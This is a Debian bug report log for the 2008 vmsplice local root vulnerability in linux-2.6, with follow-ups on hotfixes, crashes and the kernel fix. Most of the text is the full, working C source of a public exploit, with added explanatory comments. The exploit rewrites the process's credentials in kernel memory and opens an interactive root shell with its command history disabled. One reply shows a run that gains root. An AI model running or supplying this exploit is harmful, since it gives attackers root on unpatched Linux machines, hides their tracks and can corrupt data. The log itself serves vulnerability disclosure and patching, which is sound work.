Debian Bug report logs -
#464953
linux-2.6: mmap() local root exploit
Reported by: William Pitcock <nenolod@sacredspiral.co.uk>
Date: Sun, 10 Feb 2008 01:33:02 UTC
Severity: critical
Tags: patch, security
Merged with 464945,
465246
Found in versions 2.6.18.dfsg.1-17etch1, 2.6.22-3-generic, 2.6.17-1
Fixed in versions 2.6.24-4, 2.6.18.dfsg.1-18etch1, 2.6.22-6.lenny1
Done: Bastian Blank <waldi@debian.org>
Bug is archived. No further changes may be made.
Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to William Pitcock <nenolod@sacredspiral.co.uk>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: linux-2.6
Version: 2.6.22-3-generic
Severity: critical
Tags: security
Justification: root security hole
There is a security hole in all versions of linux-2.6 distributed by
Debian, including Etch's kernel.
The attached exploit code can be used to test whether a kernel is vulnerable;
on a vulnerable kernel it starts a root shell.
-- System Information:
Debian Release: lenny/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.22-3-generic (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
*** proof-of-concept.c
/*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
/*
 * User-space declaration named after the kernel's struct page. main() places
 * objects of this type inside anonymous mappings and fills in flags, private,
 * count and lru.next; the other fields are only zeroed by the memset calls.
 * NOTE(review): the field order presumably mirrors the kernel's own layout
 * for the affected versions; nothing on this page confirms that.
 */
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
/*
 * Report a failure on stdout with the "[-]" prefix and end the process.
 *
 * msg: text naming the step that failed.
 * err: errno value; when non-zero its strerror() text is appended after
 *      a colon, when zero only msg is printed.
 *
 * Both standard streams are flushed before exit(1), so this never returns.
 */
void die(char *msg, int err)
{
    const char *detail = strerror(err);

    if (err != 0) {
        printf("[-] %s: %s\n", msg, detail);
    } else {
        printf("[-] %s\n", msg);
    }

    fflush(stdout);
    fflush(stderr);
    exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
/*
 * i386 variant: build a five-word frame at the current stack pointer and
 * execute iret on it.
 * The stores fill 0x00..0x10(%esp) with, from the lowest slot up: the address
 * of exit_code, USER_CS, USER_FL, the STACK(exit_stack) address and USER_SS.
 * iret consumes that frame, so execution continues in exit_code() on the
 * exit_stack buffer and this function does not return to its caller.
 * NOTE(review): USER_CS/USER_SS/USER_FL are hard-coded selector and flag
 * values from the defines above; they presumably match the user-mode
 * segments of the targeted kernels, which this page does not show.
 */
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
/*
 * i386 variant: return the word stored at the start of the 8 KiB-aligned
 * region that contains the current stack pointer (%esp masked with ~8191).
 * NOTE(review): presumably this is the task pointer kept at the base of an
 * 8 KiB kernel stack; the structure found there is not shown on this page.
 */
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
/*
 * x86_64 variant: execute swapgs, build a five-quadword frame at the current
 * stack pointer and execute iretq on it.
 * The stores fill 0x00..0x20(%rsp) with, from the lowest slot up: the address
 * of exit_code, USER_CS, USER_FL, the STACK(exit_stack) address and USER_SS.
 * iretq consumes that frame, so execution continues in exit_code() on the
 * exit_stack buffer and this function does not return to its caller.
 * NOTE(review): USER_CS/USER_SS/USER_FL are hard-coded values from the
 * defines above; whether they match a given kernel is not shown on this page.
 */
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
/*
 * x86_64 variant: return the quadword stored at offset 0 of the %gs segment.
 * NOTE(review): presumably the per-CPU slot holding the current task pointer
 * on the targeted kernels; that layout is not shown on this page.
 */
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
/*
 * Provide _vmsplice(fd, iov, nr_segs, flags) without relying on a libc
 * wrapper: through the _syscall4 macro when the included headers define it,
 * otherwise through syscall() with the __NR_vmsplice number chosen above.
 */
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
/*
 * Function whose address main() stores in the lru.next fields it prepares.
 * Starting at the pointer returned by get_current(), it examines up to
 * 1024-13 unsigned-int positions for four consecutive words equal to the
 * saved uid followed by four equal to the saved gid. On the first match it
 * zeroes all eight words, skips one pointer-sized field, sets the next three
 * words to ~0 and stops scanning. It always finishes through exit_kernel().
 * NOTE(review): the matched words are presumably the uid and gid fields of
 * the current task and the three following words its capability sets; the
 * structure layout is not shown on this page.
 */
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i < 1024-13; i++) {
/* Pattern: uid repeated four times, then gid repeated four times. */
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
/* Step over the eight words and one pointer-sized field. */
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
/*
 * User-mode continuation: used as the iret target in exit_kernel() and
 * registered as the SIGPIPE handler in main().
 * Exits through die("wtf", 0) unless getuid() reports 0; otherwise prints
 * "[+] root" and replaces the process with an interactive /bin/bash.
 */
void exit_code()
{
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
/*
 * The spawned shell gets /dev/null as its history file, so commands typed
 * there are not saved to a history file. For incident response, an empty
 * or unchanged shell history is therefore not evidence of inactivity.
 */
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
/* Reached only if execl() failed. */
die("/bin/bash", errno);
}
/*
 * Entry point of the proof of concept attached to this bug report.
 * It prepares three fixed-address anonymous mappings and one larger mapping
 * with a page removed near its end, then issues a single vmsplice() call on
 * a pipe whose read end is already closed.
 *
 * Reports later in this log (messages #43 and #80) describe machine hangs
 * and a corrupted root partition after this program was run. Comparing the
 * installed kernel with the "Fixed in versions" list at the top of the
 * report is a check that does not touch kernel memory.
 */
int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];
/* Save the caller's ids in the file-scope uid/gid that kernel_code() compares against. */
uid = getuid();
gid = getgid();
/* Set real, effective and saved ids all to the current real ids. */
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");
/* Stop when the uid or gid is already 0. */
if (!uid || !gid)
die("!@#$", 0);
/*****/
/*
 * First fixed mapping. The address is the pointer obtained by reinterpreting
 * the int pair {0, PAGE_SIZE}; pages[1] is the struct page slot right after.
 * NOTE(review): in the i386 runs quoted later in this log this mapping is
 * 0x0 .. 0x1000. A kernel enforcing a nonzero vm.mmap_min_addr refuses such
 * a page-zero MAP_FIXED request from an unprivileged process.
 */
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
/* NOTE(review): %lx is given pointer arguments here and below; %p is the matching conversion. */
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
/* Fill the two fake entries: compound flag, self-reference, count 1, kernel_code in lru.next. */
pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
/*
 * Second fixed mapping. Its address is the first pointer-sized value stored
 * at pages[0], i.e. the flags word written just above. It gets the same
 * field setup as the first mapping.
 */
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
/* Third fixed mapping, at the pointer built from the int pair {PAGE_SIZE, 0}; only zero-filled. */
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
/* Kernel-chosen mapping of PIPE_BUFFERS * 3 + 2 zero-filled pages. */
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
/* Unmap the page that follows the first PIPE_BUFFERS * 3 pages, leaving a hole there. */
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
/*****/
/* The pipe keeps only its write end; exit_code() is installed as the SIGPIPE handler. */
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
/*
 * One iovec starting at the large mapping with length ULONG_MAX, i.e. far
 * beyond anything this process has mapped. On the vanilla 2.6.24.2 run
 * quoted later in this log the call is rejected and the program prints
 * "[-] vmsplice: Bad address".
 */
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
/* Reached only when vmsplice() returns to this code path. */
die("vmsplice", errno);
return 0;
}
Merged 464945 464953.
Request was from Gregory Colpart <reg@evolix.fr>
to control@bugs.debian.org.
(Sun, 10 Feb 2008 02:15:06 GMT) (full text, mbox, link).
Tags added: patch
Request was from Bastian Blank <waldi@debian.org>
to control@bugs.debian.org.
(Sun, 10 Feb 2008 12:03:07 GMT) (full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Morten Hustveit <morten@rashbox.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #14 received at 464953@bugs.debian.org (full text, mbox, reply):
Hi,
a modification of the exploit that finds the address of sys_vmsplice in the
kernel (using /proc/kallsyms) and replaces the first byte with a RET instruction
(using mmap of /dev/kmem) is available at
http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c
--
Morten Hustveit
Bug marked as found in version 2.6.18.dfsg.1-17etch1.
Request was from "Artur R. Czechowski" <arturcz@hell.pl>
to control@bugs.debian.org.
(Sun, 10 Feb 2008 19:45:04 GMT) (full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Ari Pollak <ari@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #21 received at 464953@bugs.debian.org (full text, mbox, reply):
Unofficial prebuilt packages are here:
http://134.2.34.20/blank/debian/linux-2.6/
as referenced here:
http://lists.debian.org/debian-kernel/2008/02/msg00363.html
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Duncan Robertson <duncan@zog.net.au>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #26 received at 464953@bugs.debian.org (full text, mbox, reply):
Just mentioning that the hotfix mentioned here:
http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c
appeared to have wedged (crashed hard, frozen) my machine, an otherwise
very stable Pentium 4 machine running 2.6.18-5-686 (with nvidia
oldstable xorg proprietary drivers). Nothing in syslog, etc.
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Duncan Robertson <duncan@zog.net.au>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #31 received at 464953@bugs.debian.org (full text, mbox, reply):
Just following up: the reported problem with the security patch has not
re-occurred since rebooting (and rerunning the fix), and there was no problem
with 2 servers patched with disable-vmsplice-if-exploitable.c either.
Also, I meant nvidia-kernel-legacy-96xx-2.6.18-5-686, not "oldstable".
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Michael Holzt <debian-bugreports@michael.holzt.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #36 received at 464953@bugs.debian.org (full text, mbox, reply):
Just for the record: Do not use the "hotfix" named disable-vmsplice-if-
exploitable.c. The hotfix first tries to run the exploit (which would be
totally unnecessary for the actual "fix" by the way and is therefore a
very dumb thing to do), and this still leads to kernel memory corruption
which will render the system unstable. You can imagine what might come
from corrupted kernel beside a simple crash (e.g. data loss).
It should be possible to remove the actual exploit attempt from the "fix",
but there seems to be another solution, which apparently compiles to a kernel
module that will catch and report attempts to (ab)use vmsplice, at
http://home.powertech.no/oystein/ptpatch2008/ptpatch2008.c
Regards
Michael
--
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks
Tags added: pending
Request was from Bastian Blank <waldi@alioth.debian.org>
to control@bugs.debian.org.
(Mon, 11 Feb 2008 08:51:21 GMT) (full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Jon Dowland <jon+bts@alcopop.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #43 received at 464953@bugs.debian.org (full text, mbox, reply):
The exploit code (rather than the hotfix, which I didn't
try) caused my laptop to hang (thinkpad x40 tracking sid,
one of the standard Debian kernel packages, no non-standard
modules, untainted kernel). I would not be surprised if the
reworked hotfix had the same bug in it.
We tried the hotfix on a Redhat Enterprise 5 machine at
work and that hung similarly.
The module solution Michael Holzt posted looks much safer.
--
Jon Dowland
ISS UNIX Team
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Mircea Gherzan <mgherzan@rdslink.ro>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #48 received at 464953@bugs.debian.org (full text, mbox, reply):
On a vanilla 2.6.24.2, the exploit no longer works:
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e23000 .. 0xb7e55000
[-] vmsplice: Bad address
--
Mircea Gherzan
Faculty of Automatic Control and Computers
Politehnica University of Bucharest
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to "Nikita V. Youshchenko" <yoush@cs.msu.su>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #53 received at 464953@bugs.debian.org (full text, mbox, reply):
> but seems to be another solution which apparently compiles to a kernel
> module which will catch and report attempts to (ab)use vmsplice at
> http://home.powertech.no/oystein/ptpatch2008/ptpatch2008.c
I've just tried to compile this module.
It successfully insmod'ed:
Feb 11 12:54:29 zigzag kernel: ptpatch2008: init, (c) 2008
oystein@powertech.no
Feb 11 12:54:29 zigzag kernel: ptpatch2008: syscalls c02ea3c0
Feb 11 12:54:29 zigzag kernel: hooked sys_vmsplice
However exploit code from the top of
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953 still works:
nikita@zigzag:~/adm/hotfix> ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d97000 .. 0xb7dc9000
[+] root
root@zigzag:~/adm/hotfix> whoami
root
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Asheesh Laroia <asheesh@asheesh.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #60 received at 464953@bugs.debian.org (full text, mbox, reply):
See
http://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00056.html
.
apt-get your way to the beautiful fixed future.
-- Asheesh.
--
You may worry about your hair-do today, but tomorrow much peanut butter will
be sold.
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Ivan Jager <aij+debian@andrew.cmu.edu>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #65 received at 464953@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
I modified the hotfix so it will also patch compat_sys_vmsplice, which
would be important on amd64 boxen with x86 compatibility enabled.
It's attached, or if for some reason it doesn't make it through, you can
fetch it from
http://www.andrew.cmu.edu/~aij/disable-vmsplice-if-exploitable-aij.c
Ivan
[disable-vmsplice-if-exploitable-aij.c (text/plain, attachment)]
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Kyle McMartin <kyle@mcmartin.ca>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #70 received at 464953@bugs.debian.org (full text, mbox, reply):
On Mon, Feb 11, 2008 at 01:54:35PM -0500, Ivan Jager wrote:
> I modified the hotfix so it will also patch compat_sys_vmsplice, which
> would be important on amd64 boxen with x86 compatibility enabled.
>
these "hotfixes" are so completely wrong, it's not even funny.
you're playing russian roulette with the return value.
0: b8 da ff ff ff mov $0xffffffda,%eax
5: c3 retq
is more correct (return -ENOSYS)
regards, kyle
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to Michael Holzt <debian-bugreports@michael.holzt.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #75 received at 464953@bugs.debian.org (full text, mbox, reply):
> I modified the hotfix so it will also patch compat_sys_vmsplice, which
> would be important on amd64 boxen with x86 compatibility enabled.
Once again: The "hotfix" and also your modification are stupid, stupid,
stupid and dangerous. The "hotfix" first attempts to try the exploit and
this corrupts kernel memory. It is very likely that your system will
crash shortly after, and numerous people have reported that the "hotfix"
has just that result, either instantaneously or after a short while.
Also while overwriting the vmsplice syscall with a "ret" will prevent
the hole from being abused, this will also confuse software which wants
to use the vmsplice call. At least one should return with an error. I'm
not sure if there is any software in normal use which uses vmsplice but
keep this in mind.
And finally: If you really really want to use this kind of fix, why
don't you just get rid of all the dangerous exploit code and only keep
the code from inside the "de_exploit()" function and then call this
code as root? This would do the job without causing memory corruption.
But the best fix still is to just install an updated kernel and reboot.
As said, you will reboot anyway (but at a random time), at least when using
this stupid "hotfix" which destroys your kernel memory. There might be
systems which cannot be rebooted right now, but in most cases I feel
that people who want to apply such a hotfix instead of deploying a
clean solution are just lazy.
Regards
Michael
--
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks
Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6.
(full text, mbox, link).
Acknowledgement sent to n0p <lbernal@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>.
(full text, mbox, link).
Message #80 received at 464953@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Just FYI
The exploit corrupted the system partition (reiserFS): a user on my server
tested the exploit, and the whole root partition was corrupted and impossible to recover.
It was a fully updated Debian Testing using the debian default kernel in a
fully stable pentium4 otherwise.
Next time i'll use the grsec patches and lock the fuck up of my users ¬¬
[Message part 2 (text/html, inline)]
Bug marked as fixed in version 2.6.18.dfsg.1-18etch1.
Request was from Stefan Fritsch <sf@debian.org>
to control@bugs.debian.org.
(Fri, 22 Feb 2008 19:06:10 GMT) (full text, mbox, link).
Bug marked as fixed in version 2.6.22-6.lenny1.
Request was from Stefan Fritsch <sf@debian.org>
to control@bugs.debian.org.
(Fri, 22 Feb 2008 19:06:13 GMT) (full text, mbox, link).
Bug marked as found in version 2.6.17-1.
Request was from Stefan Fritsch <sf@debian.org>
to control@bugs.debian.org.
(Fri, 22 Feb 2008 19:06:16 GMT) (full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Fri, 28 Mar 2008 07:39:02 GMT) (full text, mbox, link).